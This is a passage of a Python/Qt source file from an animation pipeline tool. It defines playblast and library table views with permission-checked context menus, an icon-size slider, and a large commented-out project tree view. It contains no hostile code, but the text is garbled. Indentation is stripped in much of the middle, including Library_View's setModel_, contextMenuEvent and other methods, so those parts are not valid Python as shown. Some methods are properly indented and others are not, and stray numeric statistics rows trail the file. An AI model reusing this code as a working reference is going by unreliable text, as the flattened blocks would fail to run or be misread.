            self.setColumnHidden(0, True)
        else:
            self.setColumnHidden(0, False)

    def contextMenuEvent(self, event):
        """Build the right-click menu for the selected playblast rows."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        node = None
        if index.isValid():
            src = self.asModelIndex(index)
            node = self.asModelNode(src)
            rows = self.selectionModel().selectedRows()
            if rows:
                node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
        actions = list()
        def_actions = list()
        if node:
            if isinstance(node, list):
                if len(node) == 1:
                    # Value comparison: "is not 0" relied on CPython small-int
                    # caching and raises a SyntaxWarning on Python >= 3.8.
                    if node[0].number != 0:
                        if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.revert_master):
                            actions.append(QtWidgets.QAction("Revert master playblast to {}".format(node[0].fullName), menu, triggered=functools.partial(self.revert_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
                        actions.append(QtWidgets.QAction("Delete...", menu, triggered=functools.partial(self.delete, node)))
                    def_actions.append(QtWidgets.QAction("Explore...", menu, triggered=functools.partial(self.explore, node)))
            else:
                if self.parent.current_component:
                    pass
        else:
            event.accept()
            return
        menu.addActions(actions)
        menu.addSeparator()
        menu.addActions(def_actions)
        menu.setStyleSheet(self.css)
        menu.exec_(event.globalPos())
        event.accept()
        return

    def MultiButtonClicked(self):
        """Slot for the per-row play button: play the clicked playblast.

        ``self.sender()`` is the QPushButton itself; its position
        identifies the clicked row.
        """
        button = self.sender()
        index = self.indexAt(button.pos())
        index = self.model().mapToSource(index)
        node = self.model().sourceModel().getNode(index)
        if node.typeInfo() == cfg._playblast_:
            node.play()

    def revert_(self, node):
        """Ask for confirmation, then revert the master playblast."""
        if isinstance(node, list):
            msg = "Are you sure you want to revert your master playblast to {}?".format(node[0].fullName)
            prompt = massage.PromptUser(self, prompt=msg, override_yes_text="Yes", override_no_label="No")
            result = prompt.exec_()
            # PromptUser returns 0 on "Yes".
            if result == 0:
                node[0].revert_()
class Library_View(Versions_View):
    def __init__(self, parentWidget=None, parent=None, settings = None):
        """Library table: a Versions_View restricted to single-row selection."""
        super(Library_View, self).__init__(parentWidget, parent, settings)
        self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
def setModel_(self, model=None):
self.clearModel()
if model:
# model._rowHeight = self._slider.listSlider.value()
self._proxyModel = models.Simple_ProxyModel()
self._proxyModel.setSourceModel(model)
self._proxyModel.setDynamicSortFilter(True)
self._proxyModel.setSortRole(models.Versions_Model.sortRole)
self.setModel(self._proxyModel)
# self.setIndentation(0)
self.proxyModel = self.model()
self.sourceModel = self.proxyModel.sourceModel()
self.horizontalHeader().resizeSection(0, 32) # self._slider.listSlider.value())
QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(1, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
self.horizontalHeader().setStretchLastSection(False)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().resizeSection(3, 32)
QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().resizeSection(4, 40)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
#
# self.horizontalHeader().resizeSection(5, 50)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
#
# self.horizontalHeader().resizeSection(6, 32)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
# setup the buttons for loading and more options with delegates
self.setItemDelegateForColumn(3, Library_delegate(self))
# self.setItemDelegateForColumn(0, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(1, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(2, Standard_table_Delegate(self))
# self.setItemDelegateForColumn(1, NoteDelegate(self))
self.sortByColumn(1, QtCore.Qt.DescendingOrder)
self.verticalHeader().setDefaultSectionSize(32)
'''
This is to hide the author column if no users are in the active project
'''
# if not self.parent.project.users:
# self.setColumnHidden( 4, True)
# else:
# self.setColumnHidden(4, False)
#
# if model.items[0].number == 0:
# self.setColumnHidden(0, True)
# else:
# self.setColumnHidden(0, False)
def contextMenuEvent(self, event):
handled = True
index = self.indexAt(event.pos())
menu = QtWidgets.QMenu()
node = None
if index.isValid():
src = self.asModelIndex(index)
node = self.asModelNode(src)
# node = self.asModelNode(id)
top_actions = list()
def_actions = list()
if node:
if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
def_actions.append(QtWidgets.QAction("Reference to current scene", menu, triggered=functools.partial(self.reference, node)))
def_actions.append(QtWidgets.QAction("Explore...", menu,
triggered=functools.partial(self.explore, node)))
else:
event.accept()
return
menu.addActions(top_actions)
menu.addSeparator()
menu.addActions(def_actions)
menu.setStyleSheet(self.css)
menu.exec_(event.globalPos())
event.accept()
def explore(self, node):
if node:
try:
node.master_model().items[0].explore()
except:
pass
def reference(self, node):
if node:
try:
node.master_model().items[0].reference()
except:
pass
def MultiButtonClicked(self):
    """Slot fired when a delegate-created button in a row is clicked.

    ``self.sender()`` is the QPushButton the delegate created (not the
    delegate itself); its position locates the row, and the row's node has
    its first master item referenced into the scene.
    """
    clicked_button = self.sender()
    proxy_index = self.indexAt(clicked_button.pos())
    source_index = self.model().mapToSource(proxy_index)
    node = self.model().sourceModel().getNode(source_index)
    node.master_model().items[0].reference()
# def setModel_(self, model=None):
# self.clearModel()
# if model:
# model._rowHeight = self._slider.listSlider.value()
# self._proxyModel = models.Masters_ProxyModel()
# self._proxyModel.setSourceModel(model)
# self._proxyModel.setDynamicSortFilter(True)
# self._proxyModel.setSortRole(models.Masters_Model.sortRole)
# self.setModel(self._proxyModel)
#
# self.setIndentation(0)
# self.expandAll()
#
# self.header().resizeSection(0, self._slider.listSlider.value())
#
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(1, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
# self.header().setStretchLastSection(False)
#
#
# QtCompat.setSectionResizeMode(self.header(), 2, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 3, QtWidgets.QHeaderView.Stretch)
# QtCompat.setSectionResizeMode(self.header(), 4, QtWidgets.QHeaderView.Stretch)
#
# self.header().resizeSection(5, 50)
#
# QtCompat.setSectionResizeMode(self.header(), 5, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(6, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 6, QtWidgets.QHeaderView.Fixed)
# self.header().resizeSection(7, 32)
#
# QtCompat.setSectionResizeMode(self.header(), 7, QtWidgets.QHeaderView.Fixed)
#
# self.setItemDelegateForColumn(7, loadButtonDelegate(self))
#
# self.sortByColumn(1, QtCore.Qt.DescendingOrder)
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
# # self.update()
# def MultiButtonClicked(self):
# # This slot will be called when our button is clicked.
# # self.sender() returns a reference to the QPushButton created
# # by the delegate, not the delegate itself.
# button = self.sender()
# index = self.indexAt(button.pos())
# index = self.model().mapToSource(index)
# if self.model().sourceModel().getNode(index).typeInfo() == cfg._new_:
# parent_index = index.parent()
# node = self.model().sourceModel().getNode(index).parent()
# self.model().sourceModel().removeRows(index.row(), 1, parent_index)
# node.initialVersion()
# else:
# self.model().sourceModel().getNode(index).load()
# self.parent.set_thumbnail(self.model().sourceModel().getNode(index).resource)
# self.parent.version = self.model().sourceModel().getNode(index)
# self.setCurrentIndex(self.model().mapFromSource(index))
# for btn in self._buttons:
# btn.setIcon(QtGui.QIcon(cfg.open_icon))
#
# button.setIcon(QtGui.QIcon(cfg.reload_icon))
# # try:
# # version_buttons = self.parent.versionsView._buttons
# # for btn in self.version_buttons:
# # btn.setIcon(QtGui.QIcon(cfg.open_icon))
# # except:
# # print "can not reset versions table"
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() == cfg._master_:
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
class IconScaleSlider(QtWidgets.QWidget):
    """A horizontal slider flanked by small/large icons.

    The slider value (32-96, default 32) is read elsewhere via
    ``listSlider.value()`` to scale icon/row sizes in the views.
    Attribute names (including the historical ``_lable`` spelling) are kept
    because other widgets reach into this object directly.
    """

    def __init__(self, parent):
        super(IconScaleSlider, self).__init__(parent)
        # icon labels sitting on either side of the slider
        self.small_lable = QtWidgets.QLabel()
        self.small_lable.setMaximumSize(QtCore.QSize(16, 16))
        self.small_lable.setPixmap(cfg.small_icon)
        self.large_lable = QtWidgets.QLabel()
        self.large_lable.setMaximumSize(QtCore.QSize(16, 16))
        self.large_lable.setPixmap(cfg.large_icon)
        # the slider itself: its value maps directly to a pixel size
        slider = QtWidgets.QSlider()
        slider.setOrientation(QtCore.Qt.Horizontal)
        slider.setMaximumWidth(80)
        slider.setMinimumWidth(80)
        slider.setMaximumHeight(25)
        slider.setMinimum(32)
        slider.setMaximum(96)
        slider.setValue(32)
        self.listSlider = slider
        # container widget kept for interface compatibility
        self.slideWidget = QtWidgets.QWidget()
        self.slideWidget.setMaximumHeight(20)
        layout = QtWidgets.QHBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        layout.setAlignment(QtCore.Qt.AlignRight)
        for child in (self.small_lable, self.listSlider, self.large_lable):
            layout.addWidget(child)
        self.slideLayout = layout
        self.setMinimumHeight(25)
        self.setLayout(layout)
#
# class Project_Tree_View(QtWidgets.QTreeView):
# percentage_complete = QtCore.Signal(int)
# update_view = QtCore.Signal()
#
# def __init__(self, parent=None):
# super(Project_Tree_View, self).__init__(parent)
#
# global counter
#
# # display options
#
# self.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
# self.setAlternatingRowColors(True)
# self.setSortingEnabled(True)
# self.setDragEnabled(True)
# self.setAcceptDrops(True)
# self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
# self.setDropIndicatorShown(True)
# self.resizeColumnToContents(True)
#
# # self.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
#
# # local variables
# self.pipelineUI = self.parent()
# self._ignoreExpentions = False
# self._expended_states = None
# self._userSelection = None
# self._tableView = None
# self._proxyModel = None
# self._sourceModel = None
# self._tree_as_flat_list = None
#
# self.setStyleSheet('''
#
# QTreeView::item:focus {
# }
# QTreeView::item:hover {
# background: #101010;
# }
# QTreeView {
# outline: 0;
# }
# QTreeView::branch:has-siblings:!adjoins-item {
# border-image:url(''' + cfg.vline + ''') 0;
# }
#
# QTreeView::branch:has-siblings:adjoins-item {
# border-image:url(''' + cfg.branch_more + ''') 0;
# }
#
# QTreeView::branch:!has-children:!has-siblings:adjoins-item {
# border-image:url(''' + cfg.branch_end + ''') 0;
# }
#
# QTreeView::branch:has-children:!has-siblings:closed,
# QTreeView::branch:closed:has-children:has-siblings {
# border-image: none;
# image:url(''' + cfg.branch_closed + ''') 0;
# }
#
# QTreeView::branch:open:has-children:!has-siblings,
# QTreeView::branch:open:has-children:has-siblings {
# border-image: none;
# image: url(''' + cfg.branch_open + ''') 0;
# }''')
# #
#
# self.changed = False
# self.update_view.connect(self.model_changed)
#
# def model_changed(self):
# if self.changed == False:
# self.changed = True
#
# def setModel(self, model):
#
# super(Project_Tree_View, self).setModel(model)
#
# if model:
# self.changed = False
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
#
# '''
# this will expend the tree only on the first level, which should be
# the projects name folder
# the rest will be collapsed
# '''
#
# self.initialExpension()
#
# '''
# save the expended state of the tree
# '''
# self.saveState()
#
# self.header().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Stretch)
#
#
# self.header().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
#
# def initialExpension(self):
# if self.model():
# self.collapseAll()
# return
# for row in range(self.model().rowCount(self.rootIndex())):
# x = self.model().index(row, 0, self.rootIndex())
# self.setExpanded(x, True)
#
# @property
# def tableView(self):
# return self._tableView
#
# @tableView.setter
# def tableView(self, view):
# self._tableView = view
#
# @property
# def proxyModel(self):
# return self._proxyModel
#
# @proxyModel.setter
# def proxyModel(self, model):
# self._proxyModel = model
#
# @property
# def sourceModel(self):
# return self._sourceModel
#
# @sourceModel.setter
# def sourceModel(self, model):
# self._sourceModel = model
#
# @property
# def userSelection(self):
# return self._userSelection
#
# @userSelection.setter
# def userSelection(self, selection):
# self._userSelection = selection
#
# def asProxyIndex(self, index):
# return self.proxyModel.index(0, 0, index)
#
# def asModelIndex(self, index):
# return self.proxyModel.mapToSource(index)
#
# def fromProxyIndex(self, index):
# return self.proxyModel.mapFromSource(index)
#
# def asModelNode(self, index):
# return self.sourceModel.getNode(index)
#
# def modelIndexFromNode(self, node):
# return self.sourceModel.indexFromNode(node, self.rootIndex())
#
# def selectRoot(self):
#
# self.setCurrentIndex(self.asProxyIndex(self.rootIndex()))
# # self.tableView.update(self.selectionModel().selection())
# self.saveSelection()
#
# def saveSelection(self):
#
# if len(self.selectedIndexes()) > 0:
# self.userSelection = self.asModelIndex(self.selectedIndexes()[0])
#
# def saveState(self):
#
# '''
# recursive function to save the expention state fo the tree to a dictionary
# '''
#
# if self._ignoreExpentions == True:
# return
#
# def rec(dict, mdl, index):
#
# for row in range(mdl.rowCount(index)):
#
# i = mdl.index(row, 0, index)
# node = mdl.data(i, 165)
#
# if self.isExpanded(i):
# dict[node] = True
# else:
# dict[node] = False
#
# rec(dict, mdl, i)
#
# self._expended_states = {}
# rec(self._expended_states, self.proxyModel, self.rootIndex())
#
# def restoreState(self):
#
# '''
# recursive function to restore the expention state fo the tree to a dictionary
# '''
#
# def rec(mdl, index):
#
# for row in range(mdl.rowCount(index)):
#
# i = mdl.index(row, 0, index)
# node = mdl.data(i, 165)
#
# if node in self._expended_states:
# if self._expended_states[node] == True:
# self.setExpanded(i, True)
#
# rec(mdl, i)
#
# self.collapseAll()
# rec(self.proxyModel, self.rootIndex())
# self.restoreSelection()
#
# def restoreSelection(self):
#
# index = self.fromProxyIndex(self.userSelection)
# self.select(index)
# self.updateTable(index)
# # self.selectionModel().select(index, QtWidgets.QItemSelectionModel.ClearAndSelect)
#
# def select(self, index):
# '''
# selects a tree branch and expand the parant branch to see the selected branch
# '''
# modelIndex = self.sourceModel.parent(self.asModelIndex(index))
# proxyIndex = self.fromProxyIndex(modelIndex)
# self.setExpanded(proxyIndex, True)
# self.selectionModel().select(index, QtWidgets.QItemSelectionModel.ClearAndSelect)
#
# def dropEvent(self, event):
#
# super(Project_Tree_View, self).dropEvent(event)
# # QTreeView.dropEvent(self, evt)
# if not event.isAccepted():
# # qdnd_win.cpp has weird behavior -- even if the event isn't accepted
# # by target widget, it sets accept() to true, which causes the executed
# # action to be reported as "move", which causes the view to remove the
# # source rows even though the target widget didn't like the drop.
# # Maybe it's better for the model to check drop-okay-ness during the
# # drag rather than only on drop; but the check involves not-insignificant work.
# event.setDropAction(QtCore.Qt.IgnoreAction)
#
# '''
# if the drop is coming from the contents view - this is how i handle this...
# it's UGLY, but for now it's the only way i can make this work...
# '''
# # print event.possibleActions() , "<<"
# if event.source().__class__.__name__ == 'PipelineContentsView':
#
# i = self.indexAt(event.pos())
# model_index = self.asModelIndex(i)
# model_id = self.sourceModel.getNode(model_index).id
# model_node = self.sourceModel.getNode(model_index)
#
# if model_index.isValid():
#
# mime = event.mimeData()
# source = event.source()
#
# item = cPickle.loads(str(mime.data('application/x-qabstractitemmodeldatalist')))
# item_index = self.sourceModel.indexFromNode(item, QtCore.QModelIndex())
# item_parent = self.sourceModel.parent(item_index)
# item_id = item.id
#
# '''
# ignore drops of folders into assets
# '''
# if model_node.typeInfo() == cfg._asset_:
# if item.typeInfo() == cfg._folder_ or item.typeInfo() == cfg._asset_:
# event.setDropAction(QtCore.Qt.IgnoreAction)
# event.ignore()
# return
#
# '''
# this is to make sure the dropped item is not already a child in the downstream of branches
# '''
# descending_id = []
# for i in self.sourceModel.listHierarchy(item_index):
# descending_id.append(self.sourceModel.getNode(i).id)
#
# if model_id in descending_id:
#
# event.setDropAction(QtCore.Qt.IgnoreAction)
# event.ignore()
# return
#
# else:
#
# source.clearModel()
# self.sourceModel.removeRows(item_index.row(), 1, item_parent)
# self._proxyModel.invalidate()
#
# self.sourceModel.dropMimeData(mime, event.dropAction, 0, 0, model_index)
# source.restoreTreeViewtSelection()
# return
#
# # this was required when i misused the insert rows function of the model...
# # self._proxyModel.invalidate()
#
# '''
# here i am detecting if a drop is coming from the contents view, to mark it as acepted, otherwise the drop will be blocked.
# it's UGLY, but for now it's the only way i can make this work...
# '''
#
# def dragEnterEvent(self, event):
#
# super(Project_Tree_View, self).dragEnterEvent(event)
#
# if event.source().__class__.__name__ == 'PipelineContentsView':
# return event.setAccepted(True)
#
# '''
# def dragMoveEvent(self, event):
#
# super(pipelineTreeView,self).dragMoveEvent(event)
# #return event.setAccepted(True)
# '''
#
# def projectRootIndex(self):
# modelRootIndex = self.asModelIndex(self.rootIndex())
# return modelRootIndex
# # get the first childe of the model's root
# # return self.sourceModel.index(0,0,modelRootIndex)
#
# # def mouseReleaseEvent(self, event):
# #
# # super(pipelineTreeView, self).mouseReleaseEvent(event)
# # self.saveSelection()
# # #self.tableView.update(self.selectionModel().selection())
# # event.accept
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() != cfg._stage_:
#
# level_name, level_type = node.level_options
#
# if node.typeInfo() == cfg._root_:
# actions.append(QtWidgets.QAction("Create tree...", menu,
# triggered=functools.partial(self.create_new_tree, src)))
#
# if level_type == cfg._folder_:
# actions.append(
# QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_folder, src, level_name)))
#
# elif level_type == cfg._asset_:
# actions.append(QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_asset, src, level_name)))
#
# elif level_type == cfg._stage_:
# actions.append(QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_stage, src)))
#
# elif node.typeInfo() == cfg._asset_:
# actions.append(QtWidgets.QAction("Create new %s" % (cfg._stage_), menu,
# triggered=functools.partial(self.create_new_stage, src)))
#
# if not node.typeInfo() == cfg._root_:
# actions.append(QtWidgets.QAction("Delete", menu, triggered=functools.partial(self.delete, src)))
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
#
# '''
# functions to add/remove tree nodes
# this is we will want some user input...
#
# '''
#
# def explore(self, index):
# node = self.asModelNode(index)
# node.explore()
#
# def delete(self, index):
# # clear the table view
# # self.tableView.update(QtWidgets.QItemSelection())
#
# node = self.asModelNode(index)
# node.deathrow()
# # parentIndex = self.sourceModel.parent(index)
# # self.sourceModel.removeRows(node.row(),1,parentIndex, kill=True)
# self._proxyModel.invalidate()
# #
# # self.updateTable( self.fromProxyIndex(parentIndex))
# self.update_view.emit()
# return True
#
# def create_new_tree(self, parent):
# global counter
# global total_items
# counter = 0
# total_items = 0
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# def rec(items, p, stages, name_format):
#
# global counter
# global total_items
# """ recursive function for generating a tree out of the instructions list called items
# the function creates nodes by instruction in the first item in the list, then while the list is longer then 1,
# it sends the list againg but without the current item
# the parent is the currently created node"""
# times = items[0][2]
# start = items[0][3]
# name = items[0][1]
# padding = items[0][4]
#
# for i in range(times):
# base_folder_name = name
#
# number = files.set_padding(start + i, padding)
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if padding > 1 else base_folder_name
# else:
# folder_name = "{0}".format(number) if times > 1 else "unnamed_folder"
#
# skip = False
# for child in p.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# i = self.sourceModel.indexFromNode(p, QtCore.QModelIndex())
# depth_list = self.sourceModel.listAncestos(i)
#
# path = os.path.join(p.path, folder_name)
#
# if len(items) == 1:
# node = assets.AssetNode(folder_name, path=path, parent=p, virtual=True,
# section=p.section)
#
# self.sourceModel.insertRows(0, 0, parent=i, node=node)
# self._proxyModel.invalidate()
# counter += 1
# # QtWidgets.QApplication.processEvents()
# # #print remap(current, 0, total_items, 0, 100)
# # self.percentage_complete.emit(remap(current, 0, total_items, 0, 100))
#
# '''for an asset, generate stages:'''
#
# new_index = self.sourceModel.indexFromNode(node, QtCore.QModelIndex())
# for s in stages:
# if stages[s]:
# path = os.path.join(p.path, folder_name, s)
# # formatDepth
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=node, path=path, virtual=True,
# name_format=name_format, section=p.section,
# project=self.pipelineUI.project, depth=len(depth_list))
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=new_index, node=stageNode)
# self._proxyModel.invalidate()
# # counter += 1
# # QtWidgets.QApplication.processEvents()
# # #print remap(current, 0, total_items, 0, 100)
# # self.percentage_complete.emit(remap(current, 0, total_items, 0, 100))
#
# else:
# node = dt.FolderNode(folder_name, path=path, parent=p, virtual=True,
# section=p.section, project=self.pipelineUI.project,
# depth=len(depth_list))
#
# self.sourceModel.insertRows(0, 0, parent=i, node=node)
# self._proxyModel.invalidate()
# counter += 1
#
# if len(items) > 1:
#
# QtWidgets.QApplication.processEvents()
#
# # print remap_value(counter, 0, total_items, 0, 100), "--->", counter, "--->", total_items
# self.percentage_complete.emit(misc.remap_value(counter, 0, total_items, 0, 100))
# l = list(items[1:])
# rec(l, node, stages, name_format)
# else:
# pass
#
# folderDlg = outliner.newTreeDialog(project=self.pipelineUI.project, section=parent_node.section)
# result = folderDlg.exec_()
# res = folderDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# levels = res["levels"]
#
# total_current_level = levels[0][2]
# total_items = total_current_level
#
# for i in range(1, len(levels)):
# total_current_level = (total_current_level * levels[i][2])
# total_items += total_current_level
#
# rec(levels, parent_node, res["stages"], res["name_format"])
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_folder(self, parent, string):
#
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# folderDlg = outliner.newFolderDialog(string=string)
# result = folderDlg.exec_()
# res = folderDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# base_folder_name = res["name"]
#
# for i in range(0, res["quantity"]):
# QtWidgets.QApplication.processEvents()
# self.percentage_complete.emit(misc.remap_value(i, 0, res["quantity"], 0, 100))
#
# number = files.set_padding(res["from"] + i, res["padding"])
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if res["padding"] > 0 else base_folder_name
# else:
# folder_name = "{0}".format(number) if res["quantity"] > 1 else "unnamed_folder"
#
# skip = False
# for child in parent_node.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# path = os.path.join(parent_node.path, folder_name)
# node = dt.FolderNode(folder_name, path=path, parent=parent_node, virtual=True,
# section=parent_node.section, project=self.pipelineUI.project, depth=len(ancestors))
#
# self.sourceModel.insertRows(0, 0, parent=parent, node=node)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_asset(self, parent, string):
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# assetDlg = outliner.newAssetDialog(stages=self.pipelineUI.project.stages[parent_node.section], ancestors=ancestors,
# string=string, project=self.pipelineUI.project)
# result = assetDlg.exec_()
# res = assetDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# base_folder_name = res["name"]
# for i in range(0, res["quantity"]):
# QtWidgets.QApplication.processEvents()
# self.percentage_complete.emit(misc.remap_value(i, 0, res["quantity"], 0, 100))
# number = files.set_padding(res["from"] + i, res["padding"])
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if res["padding"] > 1 else base_folder_name
# else:
# folder_name = "{0}".format(number) if res["quantity"] > 1 else "unnamed_folder"
#
# skip = False
# for child in parent_node.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# path = os.path.join(parent_node.path, folder_name)
# node = assets.AssetNode(folder_name, path=path, parent=parent_node, virtual=True,
# section=parent_node.section)
# # if node is not False:
# self.sourceModel.insertRows(0, 0, parent=parent, node=node)
# self._proxyModel.invalidate()
#
# new_index = self.sourceModel.indexFromNode(node, QtCore.QModelIndex())
# for s in res["stages"]:
# if res["stages"][s]:
# path = os.path.join(parent_node.path, folder_name, s)
# # formatDepth
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=node, path=path, virtual=True,
# name_format=res["name_format"], section=parent_node.section,
# project=self.pipelineUI.project, depth=len(ancestors))
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=new_index, node=stageNode)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_stage(self, parent):
#
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# new_stages = []
# for stage in self.pipelineUI.project.stages[parent_node.section]:
# if stage not in parent_node.stages:
# new_stages.append(stage)
#
# if new_stages:
#
# assetDlg = outliner.newStageDialog(parent_name=parent_node.name, stages=new_stages, ancestors=ancestors,
# project=self.pipelineUI.project)
# result = assetDlg.exec_()
# res = assetDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# for s in res["stages"]:
# if res["stages"][s]:
# path = os.path.join(parent_node.path, s)
# # formatDepth
#
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=parent_node, asset_name=parent_node.name, path=path,
# virtual=True, name_format=res["name_format"],
# section=parent_node.section, settings=self.pipelineUI.settings)
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=parent, node=stageNode)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
#
# @property
# def tree_as_flat_list(self):
# return self._tree_as_flat_list
#
# @tree_as_flat_list.setter
# def tree_as_flat_list(self, list):
# self._tree_as_flat_list = list
#
# def list_flat_hierarchy(self):
#
# list = []
# for i in self.sourceModel.listHierarchy(QtCore.QModelIndex()):
# list.append(self.sourceModel.getNode(i))
#
# self.tree_as_flat_list = list
#
# def filterContents(self):
#
# if self.tree_as_flat_list:
# # self.tableView.clearModel()
#
# model = models.PipelineContentsModel(self.tree_as_flat_list)
# # self.tableView.populateTable(model)
#
# def commit(self):
# print "commit tree:"
# self.sourceModel.rootNode.commit()
# self.changed = False
#
# class Dresser_View(Project_Tree_View):
# def __init__(self, parent=None):
# super(Dresser_View, self).__init__(parent)
#
#
# def setModel(self, model):
#
# QtWidgets.QTreeView.setModel(self, model)
#
# # super(Dresser_View, self).setModel(model)
#
# if model:
# self.changed = False
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
#
# '''
# this will expend the tree only on the first level, which should be
# the projects name folder
# the rest will be collapsed
# '''
# self.initialExpension()
# '''
# save the expended state of the tree
# '''
# self.saveState()
#
# self.header().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Stretch)
#
#
# self.header().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
#
# def initialExpension(self):
#
# if self.model():
# self.collapseAll()
# for row in range(self.model().rowCount(self.rootIndex())):
# x = self.model().index(row, 0, self.rootIndex())
# self.setExpanded(x, True)
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node:
#
# if node.typeInfo() == cfg._master_:
#
# actions.append(QtWidgets.QAction("Load", menu,
# triggered=functools.partial(self.load, src)))
#
# actions.append(QtWidgets.QAction("Reference to current", menu,
# triggered=functools.partial(self.reference_to_current, src)))
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
#
# def explore(self, index):
# node = self.asModelNode(index)
# node.explore()
#
# def load(self, index):
# node = self.asModelNode(index)
# node.load()
#
# def reference_to_current(self, index):
# node = self.asModelNode(index)
# node.reference()
#
| 37.462792
| 190
| 0.591747
| 11,990
| 121,829
| 5.905922
